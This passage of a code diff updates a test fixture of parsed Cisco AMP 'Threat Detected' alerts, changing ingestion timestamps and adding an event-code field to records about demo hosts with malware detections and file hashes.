Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -366,8 +370,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853384127Z",
+                "ingested": "2021-09-30T00:14:30.174511245Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -449,8 +454,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853385897Z",
+                "ingested": "2021-09-30T00:14:30.174513313Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -532,8 +538,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853387704Z",
+                "ingested": "2021-09-30T00:14:30.174515372Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -615,8 +622,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853389464Z",
+                "ingested": "2021-09-30T00:14:30.174517419Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -698,8 +706,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853391220Z",
+                "ingested": "2021-09-30T00:14:30.174519464Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -781,8 +790,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853392972Z",
+                "ingested": "2021-09-30T00:14:30.174521504Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -864,8 +874,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853394726Z",
+                "ingested": "2021-09-30T00:14:30.174523569Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -947,8 +958,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853396649Z",
+                "ingested": "2021-09-30T00:14:30.174525813Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -1030,8 +1042,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853398431Z",
+                "ingested": "2021-09-30T00:14:30.174527881Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -1113,8 +1126,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853400175Z",
+                "ingested": "2021-09-30T00:14:30.174529896Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -1196,8 +1210,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853401925Z",
+                "ingested": "2021-09-30T00:14:30.174536354Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -1279,8 +1294,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853403656Z",
+                "ingested": "2021-09-30T00:14:30.174538921Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -1362,8 +1378,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853405588Z",
+                "ingested": "2021-09-30T00:14:30.174541191Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159251512150196000",
@@ -1441,8 +1458,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853407347Z",
+                "ingested": "2021-09-30T00:14:30.174543224Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6176259080131183000",
@@ -1524,8 +1542,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:21.853409098Z",
+                "ingested": "2021-09-30T00:14:30.174545241Z",
